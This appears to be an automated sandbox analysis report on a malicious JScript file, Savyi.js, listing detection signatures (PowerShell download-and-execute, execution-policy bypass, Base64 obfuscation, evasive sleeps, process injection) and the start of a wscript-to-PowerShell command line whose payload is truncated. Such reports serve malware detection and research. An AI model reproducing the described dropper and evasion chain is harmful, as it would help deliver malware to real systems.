Windows
Analysis Report
Savyi.js
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript file contains suspicious strings
JavaScript source code contains functionality to generate code involving a shell, file or stream
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Savyi.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 2000 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[long base64-encoded string, truncated on the page]